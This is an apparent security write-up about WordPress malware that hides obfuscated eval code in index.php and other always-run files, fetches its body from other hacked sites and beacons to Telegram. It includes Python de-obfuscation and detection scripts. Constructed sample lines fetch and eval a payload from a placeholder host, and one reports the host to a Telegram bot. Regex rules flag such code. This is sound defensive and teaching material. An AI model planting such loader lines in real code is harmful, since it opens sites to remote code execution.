This page explains how malware on a server restores itself when someone simply accesses the WordPress site.

Why malware that has been removed from the server is automatically restored just by accessing the site

This type of malware is very common. In many cases it is parasitic: it attaches itself to the program files that WordPress executes every time it renders a page, and reinfects the site from there.

As an example, WordPress executes the following files on every request. (Other files deeper in the system may also be infected.)

index.php
wp-config.php
wp-blog-header.php
functions.php (of the active theme)

The figure below is a screenshot of malware infecting index.php.

To display the site, WordPress's index.php executes require __DIR__ . '/wp-blog-header.php'; next to that line, obfuscated malicious code has been inserted, and it runs every time the site is accessed.

I de-obfuscated this code in order to analyze it.
After repeating base64 decoding and de-obfuscation several times, the original bare code appeared.
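To show what that repeated decoding looks like in practice, here is an added example (not the author's code, and not the sample from the screenshot) that builds a constructed three-layer payload in the style described, eval(base64_decode(...)) nested inside gzinflate and str_rot13 wrappers, and then peels the layers statically, without ever executing any of them. The bare code at the bottom and the host example.invalid are placeholders.

```python
import base64
import codecs
import re
import zlib
from typing import Callable, Dict, List, Optional
from urllib.parse import unquote

# Inverse of each PHP wrapper commonly stacked around an eval()'d payload.
DECODERS: Dict[str, Callable[[bytes], bytes]] = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, like PHP gzinflate()
    "gzuncompress": zlib.decompress,                  # zlib stream, like PHP gzuncompress()
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
    "urldecode": lambda b: unquote(b.decode("latin-1")).encode("latin-1"),
}

# Matches a whole snippet of the form  <?php eval( <expr> ); ?>
EVAL_RE = re.compile(
    r"^\s*(?:<\?php)?\s*@?eval\s*\((?P<expr>.+?)\)\s*;?\s*(?:\?>)?\s*$", re.S)
# First quoted string literal inside the expression (the encoded payload).
LITERAL_RE = re.compile(r"""(['"])(?P<s>.*?)\1""", re.S)


def peel_once(code: str) -> Optional[str]:
    """Undo one eval(wrapper(...('payload'))) layer; None if the input is not one."""
    m = EVAL_RE.match(code)
    if not m:
        return None
    expr = m.group("expr")
    lit = LITERAL_RE.search(expr)
    if not lit:
        return None
    funcs = re.findall(r"(\w+)\s*\(", expr)   # wrapper names, outermost first
    data = lit.group("s").encode("latin-1")
    for fn in reversed(funcs):                 # undo the innermost wrapper first
        if fn not in DECODERS:
            return None                        # unknown wrapper: stop rather than guess
        data = DECODERS[fn](data)
    return data.decode("latin-1")


def peel(code: str, max_layers: int = 16) -> List[str]:
    """Return every layer, from the obfuscated input down to the bare code."""
    layers = [code]
    while len(layers) <= max_layers:
        nxt = peel_once(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


# --- constructed sample (hypothetical stand-in for the real payload) ---
BARE_CODE = "$p = @file_get_contents('http://example.invalid/payload.txt'); eval($p);"


def _b64(b: bytes) -> str:
    return base64.b64encode(b).decode("ascii")


def _deflate(b: bytes) -> bytes:
    c = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw DEFLATE, like PHP gzdeflate()
    return c.compress(b) + c.flush()


def build_sample() -> str:
    """Wrap BARE_CODE in three layers the way the malware in the write-up is layered."""
    l1 = "eval(base64_decode('%s'));" % _b64(BARE_CODE.encode("latin-1"))
    l2 = "eval(gzinflate(base64_decode('%s')));" % _b64(_deflate(l1.encode("latin-1")))
    rot = codecs.encode(l2, "rot13").encode("latin-1")
    return "<?php eval(str_rot13(base64_decode('%s'))); ?>" % _b64(rot)


if __name__ == "__main__":
    for depth, layer in enumerate(peel(build_sample())):
        print(f"--- layer {depth} ---\n{layer[:120]}")
```

Real samples add wrappers this table does not know (custom XOR loops, string concatenation, chr() sequences); the function deliberately stops at an unknown wrapper instead of guessing, so the last returned layer is where manual analysis picks up.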

The bare code shows that the malware reports the infection to Telegram, the messaging service. Automated hacking tools are probably used to attack a vast number of WordPress sites; only the successful compromises are reported to Telegram, and the attackers then continue from there.

For this reason, this kind of malware very often contains telegram.org links or URLs.

The following code fetches a text file from several URLs and executes it with the eval function.

eval is a PHP function that interprets a string as PHP code and executes it.

The sites above are most likely other sites the attackers have already hacked. The malware body is hosted there, and every time index.php runs, the malware is pulled from those infected sites and the reinfection repeats.

Because this malware fetches and executes its body from an external server, the attackers can change its behaviour at any time.

How to get rid of malware that automatically reinfects itself

To get rid of this type of malware, first remove the injected code from the files WordPress executes on every request:

index.php
wp-config.php
wp-blog-header.php
functions.php (of the active theme)

However, since other malware may be installed deeper within WordPress, cleaning only the files above is often not enough to remove it.

For this reason, you can detect and remove more malware by using a malware scanning and removal plugin that mechanically and comprehensively scans the WordPress files. (If you can no longer log in to your WordPress site, the .htaccess file may have been tampered with.)
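As an added example (not the plugin, and not the author's tooling), the following Python script implements the kind of mechanical scan described above: it walks a WordPress tree, flags the indicators this write-up describes (eval wrapped in base64_decode/gzinflate/str_rot13, eval of a variable, telegram.org URLs, and HTTP fetches whose result feeds eval), and marks hits in the files WordPress executes on every request so they are cleaned first. The three sample files in the block are constructed; the host example.invalid and the Telegram bot URL are placeholders.

```python
import os
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, int, str]   # (rule name, 1-based line number, offending line text)

# Files WordPress runs on every page request (functions.php meaning the active theme's).
# An injection here executes on every visit, so hits in these files are cleaned first.
ALWAYS_EXECUTED = {"index.php", "wp-config.php", "wp-blog-header.php", "functions.php"}

LINE_RULES = [
    ("obfuscated_eval",
     re.compile(r"eval\s*\(\s*@?\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("dynamic_eval", re.compile(r"@?eval\s*\(\s*\$\w+", re.I)),
    ("telegram_beacon", re.compile(r"https?://(?:[\w-]+\.)*telegram\.org", re.I)),
    ("remote_fetch", re.compile(r"(?:file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I)),
]


def scan_source(path: str, source: str) -> List[Finding]:
    """Apply the line rules, then the file-level 'fetch over HTTP and eval it' rule."""
    findings: List[Finding] = []
    for no, line in enumerate(source.splitlines(), 1):
        for rule, rx in LINE_RULES:
            if rx.search(line):
                findings.append((rule, no, line.strip()))
    rules = {r for r, _, _ in findings}
    if "remote_fetch" in rules and re.search(r"\beval\s*\(", source):
        findings.append(("remote_loader", 0, path))
    return findings


def is_always_executed(path: str) -> bool:
    return os.path.basename(path) in ALWAYS_EXECUTED


def scan_files(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan {path: source}; return only the files that produced findings."""
    result = {}
    for path, source in files.items():
        hits = scan_source(path, source)
        if hits:
            result[path] = hits
    return result


def scan_tree(root: str) -> Dict[str, List[Finding]]:
    """Read every .php file under root and scan it."""
    files: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[full] = fh.read()
    return scan_files(files)


# --- constructed samples (not real files from any compromised site) ---
CLEAN_INDEX = (
    "<?php\n"
    "define( 'WP_USE_THEMES', true );\n"
    "require __DIR__ . '/wp-blog-header.php';\n"
)
INFECTED_INDEX = (
    "<?php\n"
    "eval(base64_decode('ZWNobyAnaGknOw=='));\n"   # obfuscated stub prepended to the real index.php
    "define( 'WP_USE_THEMES', true );\n"
    "require __DIR__ . '/wp-blog-header.php';\n"
)
LOADER = (
    "<?php\n"
    "// beacon: report the newly infected host to the attacker's Telegram bot (placeholder URL)\n"
    "$bot = 'https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=0&text=' . urlencode($_SERVER['HTTP_HOST']);\n"
    "@file_get_contents($bot);\n"
    "$c = @file_get_contents('http://example.invalid/payload.txt');\n"
    "eval($c);\n"
)


if __name__ == "__main__":
    import sys
    for path, hits in scan_tree(sys.argv[1]).items():
        flag = "!!" if is_always_executed(path) else "  "
        for rule, no, text in hits:
            print(f"{flag} {path}:{no} {rule}: {text[:80]}")
```

Run it as python scan.py /path/to/wordpress and review each hit by hand. The rules are plain regular expressions, so a sample that builds the function names from string concatenation or chr() calls will slip past them; treat the output as a list of leads to inspect, not as proof that a file without hits is clean, and restore the core files from a fresh WordPress download rather than trusting an edited copy.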
